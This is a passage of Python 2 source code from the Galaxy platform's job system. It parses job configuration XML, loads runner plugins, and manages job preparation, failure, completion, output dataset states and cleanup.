return fields
# TODO: Only works with exact matches, should handle different kinds of ids
# the way destination lookup does.
resource_group = None
if tool_id in self.tools:
resource_group = self.tools[ tool_id ][ 0 ].get_resource_group()
resource_group = resource_group or self.default_resource_group
if resource_group and resource_group in self.resource_groups:
fields_names = self.resource_groups[ resource_group ]
fields = [ self.resource_parameters[ n ] for n in fields_names ]
return fields
def __parse_resource_parameters( self ):
if not os.path.exists( self.app.config.job_resource_params_file ):
return
resource_param_file = self.app.config.job_resource_params_file
try:
resource_definitions = util.parse_xml( resource_param_file )
except Exception as e:
raise config_exception(e, resource_param_file)
resource_definitions_root = resource_definitions.getroot()
# TODO: Also handling conditionals would be awesome!
for parameter_elem in resource_definitions_root.findall( "param" ):
name = parameter_elem.get( "name" )
# Considered prepending __job_resource_param__ here and then
# stripping it off when making it available to dynamic job
# destination. Not needed because resource parameters are wrapped
# in a conditional.
## expanded_name = "__job_resource_param__%s" % name
## parameter_elem.set( "name", expanded_name )
self.resource_parameters[ name ] = parameter_elem
def __get_default(self, parent, names):
"""Returns the default attribute set in a parent tag like <handlers> or <destinations>, or return the ID of the child, if there is no explicit default and only one child.
:param parent: Object representing a tag that may or may not have a 'default' attribute.
:type parent: ``xml.etree.ElementTree.Element``
:param names: The list of destination or handler IDs or tags that were loaded.
:type names: list of str
:returns: str -- id or tag representing the default.
"""
rval = parent.get('default')
if rval is not None:
# If the parent element has a 'default' attribute, use the id or tag in that attribute
if rval not in names:
raise Exception("<%s> default attribute '%s' does not match a defined id or tag in a child element" % (parent.tag, rval))
log.debug("<%s> default set to child with id or tag '%s'" % (parent.tag, rval))
elif len(names) == 1:
log.info("Setting <%s> default to child with id '%s'" % (parent.tag, names[0]))
rval = names[0]
else:
raise Exception("No <%s> default specified, please specify a valid id or tag with the 'default' attribute" % parent.tag)
return rval
def __findall_with_required(self, parent, match, attribs=None):
"""Like ``xml.etree.ElementTree.Element.findall()``, except only returns children that have the specified attribs.
:param parent: Parent element in which to find.
:type parent: ``xml.etree.ElementTree.Element``
:param match: Name of child elements to find.
:type match: str
:param attribs: List of required attributes in children elements.
:type attribs: list of str
:returns: list of ``xml.etree.ElementTree.Element``
"""
rval = []
if attribs is None:
attribs = ('id',)
for elem in parent.findall(match):
for attrib in attribs:
if attrib not in elem.attrib:
log.warning("required '%s' attribute is missing from <%s> element" % (attrib, match))
break
else:
rval.append(elem)
return rval
def __get_params(self, parent):
"""Parses any child <param> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <param> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = {}
for param in parent.findall('param'):
rval[param.get('id')] = param.text
return rval
def __get_envs(self, parent):
"""Parses any child <env> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <env> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for param in parent.findall('env'):
rval.append( dict(
name=param.get('id'),
file=param.get('file'),
execute=param.get('exec'),
value=param.text,
raw=util.asbool(param.get('raw', 'false'))
) )
return rval
def __get_resubmits(self, parent):
"""Parses any child <resubmit> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <resubmit> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for resubmit in parent.findall('resubmit'):
rval.append( dict(
condition=resubmit.get('condition'),
destination=resubmit.get('destination'),
handler=resubmit.get('handler')
) )
return rval
@property
def default_job_tool_configuration(self):
"""The default JobToolConfiguration, used if a tool does not have an explicit defintion in the configuration. It consists of a reference to the default handler and default destination.
:returns: JobToolConfiguration -- a representation of a <tool> element that uses the default handler and destination
"""
return JobToolConfiguration(id='default', handler=self.default_handler_id, destination=self.default_destination_id)
# Called upon instantiation of a Tool object
def get_job_tool_configurations(self, ids):
"""Get all configured JobToolConfigurations for a tool ID, or, if given a list of IDs, the JobToolConfigurations for the first id in ``ids`` matching a tool definition.
.. note::
You should not mix tool shed tool IDs, versionless tool shed IDs, and tool config tool IDs that refer to the same tool.
:param ids: Tool ID or IDs to fetch the JobToolConfiguration of.
:type ids: list or str.
:returns: list -- JobToolConfiguration Bunches representing <tool> elements matching the specified ID(s).
Example tool ID strings include:
* Full tool shed id: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool/1.0.0``
* Tool shed id less version: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool``
* Tool config tool id: ``filter_tool``
"""
rval = []
# listify if ids is a single (string) id
ids = util.listify(ids)
for id in ids:
if id in self.tools:
# If a tool has definitions that include job params but not a
# definition for jobs without params, include the default
# config
for job_tool_configuration in self.tools[id]:
if not job_tool_configuration.params:
break
else:
rval.append(self.default_job_tool_configuration)
rval.extend(self.tools[id])
break
else:
rval.append(self.default_job_tool_configuration)
return rval
def __get_single_item(self, collection):
"""Given a collection of handlers or destinations, return one item from the collection at random.
"""
# Done like this to avoid random under the assumption it's faster to avoid it
if len(collection) == 1:
return collection[0]
else:
return random.choice(collection)
# This is called by Tool.get_job_handler()
def get_handler(self, id_or_tag):
"""Given a handler ID or tag, return the provided ID or an ID matching the provided tag
:param id_or_tag: A handler ID or tag.
:type id_or_tag: str
:returns: str -- A valid job handler ID.
"""
if id_or_tag is None:
id_or_tag = self.default_handler_id
return self.__get_single_item(self.handlers[id_or_tag])
def get_destination(self, id_or_tag):
"""Given a destination ID or tag, return the JobDestination matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: JobDestination -- A valid destination
Destinations are deepcopied as they are expected to be passed in to job
runners, which will modify them for persisting params set at runtime.
"""
if id_or_tag is None:
id_or_tag = self.default_destination_id
return copy.deepcopy(self.__get_single_item(self.destinations[id_or_tag]))
def get_destinations(self, id_or_tag):
"""Given a destination ID or tag, return all JobDestinations matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: list or tuple of JobDestinations
Destinations are not deepcopied, so they should not be passed to
anything which might modify them.
"""
return self.destinations.get(id_or_tag, None)
def get_job_runner_plugins(self, handler_id):
"""Load all configured job runner plugins
:returns: list of job runner plugins
"""
rval = {}
if handler_id in self.handler_runner_plugins:
plugins_to_load = [ rp for rp in self.runner_plugins if rp['id'] in self.handler_runner_plugins[handler_id] ]
log.info( "Handler '%s' will load specified runner plugins: %s", handler_id, ', '.join( [ rp['id'] for rp in plugins_to_load ] ) )
else:
plugins_to_load = self.runner_plugins
log.info( "Handler '%s' will load all configured runner plugins", handler_id )
for runner in plugins_to_load:
class_names = []
module = None
id = runner['id']
load = runner['load']
if ':' in load:
# Name to load was specified as '<module>:<class>'
module_name, class_name = load.rsplit(':', 1)
class_names = [ class_name ]
module = __import__( module_name )
else:
# Name to load was specified as '<module>'
if '.' not in load:
# For legacy reasons, try from galaxy.jobs.runners first if there's no '.' in the name
module_name = 'galaxy.jobs.runners.' + load
try:
module = __import__( module_name )
except ImportError:
# No such module, we'll retry without prepending galaxy.jobs.runners.
# All other exceptions (e.g. something wrong with the module code) will raise
pass
if module is None:
# If the name included a '.' or loading from the static runners path failed, try the original name
module = __import__( load )
module_name = load
if module is None:
# Module couldn't be loaded, error should have already been displayed
continue
for comp in module_name.split( "." )[1:]:
module = getattr( module, comp )
if not class_names:
# If there's not a ':', we check <module>.__all__ for class names
try:
assert module.__all__
class_names = module.__all__
except AssertionError:
log.error( 'Runner "%s" does not contain a list of exported classes in __all__' % load )
continue
for class_name in class_names:
runner_class = getattr( module, class_name )
try:
assert issubclass(runner_class, BaseJobRunner)
except TypeError:
log.warning("A non-class name was found in __all__, ignoring: %s" % id)
continue
except AssertionError:
log.warning("Job runner classes must be subclassed from BaseJobRunner, %s has bases: %s" % (id, runner_class.__bases__))
continue
try:
rval[id] = runner_class( self.app, runner[ 'workers' ], **runner.get( 'kwds', {} ) )
except TypeError:
log.exception( "Job runner '%s:%s' has not been converted to a new-style runner or encountered TypeError on load" % ( module_name, class_name ) )
rval[id] = runner_class( self.app )
log.debug( "Loaded job runner '%s:%s' as '%s'" % ( module_name, class_name, id ) )
return rval
def is_id(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == tuple
def is_tag(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == list
def is_handler(self, server_name):
"""Given a server name, indicate whether the server is a job handler
:param server_name: The name to check
:type server_name: str
:return: bool
"""
for collection in self.handlers.values():
if server_name in collection:
return True
return False
def convert_legacy_destinations(self, job_runners):
"""Converts legacy (from a URL) destinations to contain the appropriate runner params defined in the URL.
:param job_runners: All loaded job runner plugins.
:type job_runners: list of job runner plugins
"""
for id, destination in [ ( id, destinations[0] ) for id, destinations in self.destinations.items() if self.is_id(destinations) ]:
# Only need to deal with real destinations, not members of tags
if destination.legacy and not destination.converted:
if destination.runner in job_runners:
destination.params = job_runners[destination.runner].url_to_destination(destination.url).params
destination.converted = True
if destination.params:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
for k, v in destination.params.items():
log.debug(" %s: %s" % (k, v))
else:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
else:
log.warning("Legacy destination with id '%s' could not be converted: Unknown runner plugin: %s" % (id, destination.runner))
class JobWrapper( object ):
"""
Wraps a 'model.Job' with convenience methods for running processes and
state management.
"""
def __init__( self, job, queue, use_persisted_destination=False ):
self.job_id = job.id
self.session_id = job.session_id
self.user_id = job.user_id
self.tool = queue.app.toolbox.get_tool( job.tool_id, job.tool_version, exact=True )
self.queue = queue
self.app = queue.app
self.sa_session = self.app.model.context
self.extra_filenames = []
self.command_line = None
# Tool versioning variables
self.write_version_cmd = None
self.version_string = ""
self.galaxy_lib_dir = None
# With job outputs in the working directory, we need the working
# directory to be set before prepare is run, or else premature deletion
# and job recovery fail.
# Create the working dir if necessary
try:
self.app.object_store.create(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
self.working_directory = self.app.object_store.get_filename(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
log.debug('(%s) Working directory for job is: %s' % (self.job_id, self.working_directory))
except ObjectInvalid:
raise Exception('Unable to create job working directory, job failure')
self.dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.output_paths = None
self.output_hdas_and_paths = None
self.tool_provided_job_metadata = None
# Wrapper holding the info required to restore and clean up from files used for setting metadata externally
self.external_output_metadata = metadata.JobExternalOutputMetadataWrapper( job )
self.job_runner_mapper = JobRunnerMapper( self, queue.dispatcher.url_to_destination, self.app.job_config )
self.params = None
if job.params:
self.params = loads( job.params )
if use_persisted_destination:
self.job_runner_mapper.cached_job_destination = JobDestination( from_job=job )
self.__user_system_pwent = None
self.__galaxy_system_pwent = None
def _job_dataset_path_rewriter( self, working_directory ):
if self.app.config.outputs_to_working_directory:
dataset_path_rewriter = OutputsToWorkingDirectoryPathRewriter( working_directory )
else:
dataset_path_rewriter = NullDatasetPathRewriter( )
return dataset_path_rewriter
def can_split( self ):
# Should the job handler split this job up?
return self.app.config.use_tasked_jobs and self.tool.parallelism
def get_job_runner_url( self ):
log.warning('(%s) Job runner URLs are deprecated, use destinations instead.' % self.job_id)
return self.job_destination.url
def get_parallelism(self):
return self.tool.parallelism
@property
def commands_in_new_shell(self):
return self.app.config.commands_in_new_shell
# legacy naming
get_job_runner = get_job_runner_url
@property
def job_destination(self):
"""Return the JobDestination that this job will use to run. This will
either be a configured destination, a randomly selected destination if
the configured destination was a tag, or a dynamically generated
destination from the dynamic runner.
Calling this method for the first time causes the dynamic runner to do
its calculation, if any.
:returns: ``JobDestination``
"""
return self.job_runner_mapper.get_job_destination(self.params)
def get_job( self ):
return self.sa_session.query( model.Job ).get( self.job_id )
def get_id_tag(self):
# For compatability with drmaa, which uses job_id right now, and TaskWrapper
return self.get_job().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.get_job()
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def get_version_string_path( self ):
return os.path.abspath(os.path.join(self.app.config.new_file_path, "GALAXY_VERSION_STRING_%s" % self.job_id))
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
self.sa_session.expunge_all() # this prevents the metadata reverting that has been seen in conjunction with the PBS job runner
if not os.path.exists( self.working_directory ):
os.mkdir( self.working_directory )
job = self._load_job()
def get_special( ):
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
if not special:
special = self.sa_session.query( model.GenomeIndexToolData ).filter_by( job=job ).first()
return special
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment, get_special=get_special )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
job.command_line = self.command_line
self.sa_session.add( job )
self.sa_session.flush()
# Return list of all extra files
self.param_dict = tool_evaluator.param_dict
version_string_cmd = self.tool.version_string_cmd
if version_string_cmd:
self.write_version_cmd = "%s > %s 2>&1" % ( version_string_cmd, compute_environment.version_path() )
else:
self.write_version_cmd = None
return self.extra_filenames
def default_compute_environment( self, job=None ):
if not job:
job = self.get_job()
return SharedComputeEnvironment( self, job )
def _load_job( self ):
# Load job from database and verify it has user or session.
# Restore parameters from the database
job = self.get_job()
if job.user is None and job.galaxy_session is None:
raise Exception( 'Job %s has no user and no session.' % job.id )
return job
def _get_tool_evaluator( self, job ):
# Hacky way to avoid cirular import for now.
# Placing ToolEvaluator in either jobs or tools
# result in ciruclar dependency.
from galaxy.tools.evaluation import ToolEvaluator
tool_evaluator = ToolEvaluator(
app=self.app,
job=job,
tool=self.tool,
local_working_directory=self.working_directory,
)
return tool_evaluator
def fail( self, message, exception=False, stdout="", stderr="", exit_code=None ):
"""
Indicate job failure by setting state and message on all output
datasets.
"""
job = self.get_job()
self.sa_session.refresh( job )
# if the job was deleted, don't fail it
if not job.state == job.states.DELETED:
# Check if the failure is due to an exception
if exception:
# Save the traceback immediately in case we generate another
# below
job.traceback = traceback.format_exc()
# Get the exception and let the tool attempt to generate
# a better message
etype, evalue, tb = sys.exc_info()
m = self.tool.handle_job_failure_exception( evalue )
if m:
message = m
if self.app.config.outputs_to_working_directory:
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "fail(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ), e:
log.error( "fail(): Missing output file in working directory: %s" % e )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = dataset.states.ERROR
dataset.blurb = 'tool error'
dataset.info = message
dataset.set_size()
dataset.dataset.set_total_size()
dataset.mark_unhidden()
if dataset.ext == 'auto':
dataset.extension = 'data'
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
self.sa_session.add( dataset )
self.sa_session.flush()
job.set_final_state( job.states.ERROR )
job.command_line = self.command_line
job.info = message
# TODO: Put setting the stdout, stderr, and exit code in one place
# (not duplicated with the finish method).
if ( len( stdout ) > DATABASE_MAX_STRING_SIZE ):
stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = stdout
if ( len( stderr ) > DATABASE_MAX_STRING_SIZE ):
stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = stderr
# Let the exit code be Null if one is not provided:
if ( exit_code != None ):
job.exit_code = exit_code
self.sa_session.add( job )
self.sa_session.flush()
#Perform email action even on failure.
for pja in [pjaa.post_job_action for pjaa in job.post_job_actions if pjaa.post_job_action.action_type == "EmailAction"]:
ActionBox.execute(self.app, self.sa_session, pja, job)
# If the job was deleted, call tool specific fail actions (used for e.g. external metadata) and clean up
if self.tool:
self.tool.job_failed( self, message, exception )
delete_files = self.app.config.cleanup_job == 'always' or (self.app.config.cleanup_job == 'onsuccess' and job.state == job.states.DELETED)
self.cleanup( delete_files=delete_files )
def pause( self, job=None, message=None ):
if job is None:
job = self.get_job()
if message is None:
message = "Execution of this dataset's job is paused"
if job.state == job.states.NEW:
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = dataset_assoc.dataset.dataset.states.PAUSED
dataset_assoc.dataset.info = message
self.sa_session.add( dataset_assoc.dataset )
job.set_state( job.states.PAUSED )
self.sa_session.add( job )
def mark_as_resubmitted( self ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset in [ dataset_assoc.dataset for dataset_assoc in job.output_datasets + job.output_library_datasets ]:
dataset._state = model.Dataset.states.RESUBMITTED
self.sa_session.add( dataset )
job.set_state( model.Job.states.RESUBMITTED )
self.sa_session.add( job )
self.sa_session.flush()
def change_state( self, state, info=False ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = state
if info:
dataset.info = info
self.sa_session.add( dataset )
self.sa_session.flush()
if info:
job.info = info
job.set_state( state )
self.sa_session.add( job )
self.sa_session.flush()
def get_state( self ):
job = self.get_job()
self.sa_session.refresh( job )
return job.state
def set_runner( self, runner_url, external_id ):
log.warning('set_runner() is deprecated, use set_job_destination()')
self.set_job_destination(self.job_destination, external_id)
def set_job_destination( self, job_destination, external_id=None ):
"""
Persist job destination params in the database for recovery.
self.job_destination is not used because a runner may choose to rewrite
parts of the destination (e.g. the params).
"""
job = self.get_job()
self.sa_session.refresh(job)
log.debug('(%s) Persisting job destination (destination id: %s)' % (job.id, job_destination.id))
job.destination_id = job_destination.id
job.destination_params = job_destination.params
job.job_runner_name = job_destination.runner
job.job_runner_external_id = external_id
self.sa_session.add(job)
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None, remote_working_directory=None ):
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# default post job setup
self.sa_session.expunge_all()
job = self.get_job()
# TODO: After failing here, consider returning from the function.
try:
self.reclaim_ownership()
except:
log.exception( '(%s) Failed to change ownership of %s, failing' % ( job.id, self.working_directory ) )
return self.fail( job.info, stdout=stdout, stderr=stderr, exit_code=tool_exit_code )
# if the job was deleted, don't finish it
if job.state == job.states.DELETED or job.state == job.states.ERROR:
# SM: Note that, at this point, the exit code must be saved in case
# there was an error. Errors caught here could mean that the job
# was deleted by an administrator (based on old comments), but it
# could also mean that a job was broken up into tasks and one of
# the tasks failed. So include the stderr, stdout, and exit code:
return self.fail( job.info, stderr=stderr, stdout=stdout, exit_code=tool_exit_code )
# Check the tool's stdout, stderr, and exit code for errors, but only
# if the job has not already been marked as having an error.
# The job's stdout and stderr will be set accordingly.
# We set final_job_state to use for dataset management, but *don't* set
# job.state until after dataset collection to prevent history issues
if ( self.check_tool_output( stdout, stderr, tool_exit_code, job ) ):
final_job_state = job.states.OK
else:
final_job_state = job.states.ERROR
if self.tool.version_string_cmd:
version_filename = self.get_version_string_path()
if os.path.exists(version_filename):
self.version_string = open(version_filename).read()
os.unlink(version_filename)
if self.app.config.outputs_to_working_directory and not self.__link_file_check():
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "finish(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ):
# this can happen if Galaxy is restarted during the job's
# finish method - the false_path file has already moved,
# and when the job is recovered, it won't be found.
if os.path.exists( dataset_path.real_path ) and os.stat( dataset_path.real_path ).st_size > 0:
log.warning( "finish(): %s not found, but %s is not empty, so it will be used instead" % ( dataset_path.false_path, dataset_path.real_path ) )
else:
# Prior to fail we need to set job.state
job.set_state( final_job_state )
return self.fail( "Job %s's output dataset(s) could not be read" % job.id )
job_context = ExpressionContext( dict( stdout=job.stdout, stderr=job.stderr ) )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
context = self.get_dataset_finish_context( job_context, dataset_assoc.dataset.dataset )
#should this also be checking library associations? - can a library item be added from a history before the job has ended? - lets not allow this to occur
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations: # need to update all associated output hdas, i.e. history was shared with job running
trynum = 0
while trynum < self.app.config.retry_job_output_collection:
try:
# Attempt to short circuit NFS attribute caching
os.stat( dataset.dataset.file_name )
os.chown( dataset.dataset.file_name, os.getuid(), -1 )
trynum = self.app.config.retry_job_output_collection
except ( OSError, ObjectNotFound ), e:
trynum += 1
log.warning( 'Error accessing %s, will retry: %s', dataset.dataset.file_name, e )
time.sleep( 2 )
if getattr( dataset, "hidden_beneath_collection_instance", None ):
dataset.visible = False
dataset.blurb = 'done'
dataset.peek = 'no peek'
dataset.info = (dataset.info or '')
if context['stdout'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stdout'].strip()
if context['stderr'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stderr'].strip()
dataset.tool_version = self.version_string
dataset.set_size()
if 'uuid' in context:
dataset.dataset.uuid = context['uuid']
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
if job.states.ERROR == final_job_state:
dataset.blurb = "error"
dataset.mark_unhidden()
elif dataset.has_data():
# If the tool was expected to set the extension, attempt to retrieve it
if dataset.ext == 'auto':
dataset.extension = context.get( 'ext', 'data' )
dataset.init_meta( copy_from=dataset )
#if a dataset was copied, it won't appear in our dictionary:
#either use the metadata from originating output dataset, or call set_meta on the copies
#it would be quicker to just copy the metadata from the originating output dataset,
#but somewhat trickier (need to recurse up the copied_from tree), for now we'll call set_meta()
if ( not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and self.app.config.retry_metadata_internally ):
dataset.datatype.set_meta( dataset, overwrite=False ) # call datatype.set_meta directly for the initial set_meta call during dataset creation
elif not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and job.states.ERROR != final_job_state:
dataset._state = model.Dataset.states.FAILED_METADATA
else:
#load metadata from file
#we need to no longer allow metadata to be edited while the job is still running,
#since if it is edited, the metadata changed on the running output will no longer match
#the metadata that was stored to disk for use via the external process,
#and the changes made by the user will be lost, without warning or notice
output_filename = self.external_output_metadata.get_output_filenames_by_dataset( dataset, self.sa_session ).filename_out
def path_rewriter( path ):
if not remote_working_directory or not path:
return path
normalized_remote_working_directory = os.path.normpath( remote_working_directory )
normalized_path = os.path.normpath( path )
if normalized_path.startswith( normalized_remote_working_directory ):
return normalized_path.replace( normalized_remote_working_directory, self.working_directory, 1 )
return path
dataset.metadata.from_JSON_dict( output_filename, path_rewriter=path_rewriter )
try:
assert context.get( 'line_count', None ) is not None
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( line_count=context['line_count'], is_multi_byte=True )
else:
dataset.set_peek( line_count=context['line_count'] )
except:
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( is_multi_byte=True )
else:
dataset.set_peek()
try:
# set the name if provided by the tool
dataset.name = context['name']
except:
pass
else:
dataset.blurb = "empty"
if dataset.ext == 'auto':
dataset.extension = 'txt'
self.sa_session.add( dataset )
if job.states.ERROR == final_job_state:
log.debug( "setting dataset state to ERROR" )
# TODO: This is where the state is being set to error. Change it!
dataset_assoc.dataset.dataset.state = model.Dataset.states.ERROR
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset_assoc.dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
else:
dataset_assoc.dataset.dataset.state = model.Dataset.states.OK
# If any of the rest of the finish method below raises an
# exception, the fail method will run and set the datasets to
# ERROR. The user will never see that the datasets are in error if
# they were flushed as OK here, since upon doing so, the history
# panel stops checking for updates. So allow the
# self.sa_session.flush() at the bottom of this method set
# the state instead.
for pja in job.post_job_actions:
ActionBox.execute(self.app, self.sa_session, pja.post_job_action, job)
# Flush all the dataset and job changes above. Dataset state changes
# will now be seen by the user.
self.sa_session.flush()
# Save stdout and stderr
if len( job.stdout ) > DATABASE_MAX_STRING_SIZE:
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = util.shrink_string_by_size( job.stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( job.stderr ) > DATABASE_MAX_STRING_SIZE:
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = util.shrink_string_by_size( job.stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
# The exit code will be null if there is no exit code to be set.
# This is so that we don't assign an exit code, such as 0, that
# is either incorrect or has the wrong semantics.
if None != tool_exit_code:
job.exit_code = tool_exit_code
# custom post process setup
inp_data = dict( [ ( da.name, da.dataset ) for da in job.input_datasets ] )
out_data = dict( [ ( da.name, da.dataset ) for da in job.output_datasets ] )
inp_data.update( [ ( da.name, da.dataset ) for da in job.input_library_datasets ] )
out_data.update( [ ( da.name, da.dataset ) for da in job.output_library_datasets ] )
# TODO: eliminate overlap with tools/evaluation.py
out_collections = dict( [ ( obj.name, obj.dataset_collection_instance ) for obj in job.output_dataset_collection_instances ] )
out_collections.update( [ ( obj.name, obj.dataset_collection ) for obj in job.output_dataset_collections ] )
input_ext = 'data'
for _, data in inp_data.items():
# For loop odd, but sort simulating behavior in galaxy.tools.actions
if not data:
continue
input_ext = data.ext
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] ) # why not re-use self.param_dict here? ##dunno...probably should, this causes tools.parameters.basic.UnvalidatedValue to be used in following methods instead of validated and transformed values during i.e. running workflows
param_dict = self.tool.params_from_strings( param_dict, self.app )
# Check for and move associated_files
self.tool.collect_associated_files(out_data, self.working_directory)
# Create generated output children and primary datasets and add to param_dict
collected_datasets = {
'children': self.tool.collect_child_datasets(out_data, self.working_directory),
'primary': self.tool.collect_primary_datasets(out_data, self.working_directory, input_ext)
}
self.tool.collect_dynamic_collections(
out_collections,
job_working_directory=self.working_directory,
inp_data=inp_data,
job=job,
)
param_dict.update({'__collected_datasets__': collected_datasets})
# Certain tools require tasks to be completed after job execution
# ( this used to be performed in the "exec_after_process" hook, but hooks are deprecated ).
self.tool.exec_after_process( self.queue.app, inp_data, out_data, param_dict, job=job )
# Call 'exec_after_process' hook
self.tool.call_hook( 'exec_after_process', self.queue.app, inp_data=inp_data,
out_data=out_data, param_dict=param_dict,
tool=self.tool, stdout=job.stdout, stderr=job.stderr )
job.command_line = self.command_line
bytes = 0
# Once datasets are collected, set the total dataset size (includes extra files)
for dataset_assoc in job.output_datasets:
dataset_assoc.dataset.dataset.set_total_size()
bytes += dataset_assoc.dataset.dataset.get_total_size()
if job.user:
job.user.total_disk_usage += bytes
# fix permissions
for path in [ dp.real_path for dp in self.get_mutable_output_fnames() ]:
util.umask_fix_perms( path, self.app.config.umask, 0666, self.app.config.gid )
# Finally set the job state. This should only happen *after* all
# dataset creation, and will allow us to eliminate force_history_refresh.
job.set_final_state( final_job_state )
if not job.tasks:
# If job was composed of tasks, don't attempt to recollect statisitcs
self._collect_metrics( job )
self.sa_session.flush()
log.debug( 'job %d ended' % self.job_id )
delete_files = self.app.config.cleanup_job == 'always' or ( job.state == job.states.OK and self.app.config.cleanup_job == 'onsuccess' )
self.cleanup( delete_files=delete_files )
def check_tool_output( self, stdout, stderr, tool_exit_code, job ):
return check_output( self.tool, stdout, stderr, tool_exit_code, job )
def cleanup( self, delete_files=True ):
# At least one of these tool cleanup actions (job import), is needed
# for thetool to work properly, that is why one might want to run
# cleanup but not delete files.
try:
if delete_files:
for fname in self.extra_filenames:
os.remove( fname )
self.external_output_metadata.cleanup_external_metadata( self.sa_session )
galaxy.tools.imp_exp.JobExportHistoryArchiveWrapper( self.job_id ).cleanup_after_job( self.sa_session )
galaxy.tools.imp_exp.JobImportHistoryArchiveWrapper( self.app, self.job_id ).cleanup_after_job()
if delete_files:
self.app.object_store.delete(self.get_job(), base_dir='job_work', entire_dir=True, dir_only=True, extra_dir=str(self.job_id))
except:
log.exception( "Unable to cleanup job %d" % self.job_id )
def _collect_metrics( self, has_metrics ):
job = has_metrics.get_job()
per_plugin_properties = self.app.job_metrics.collect_properties( job.destination_id, self.job_id, self.working_directory )
if per_plugin_properties:
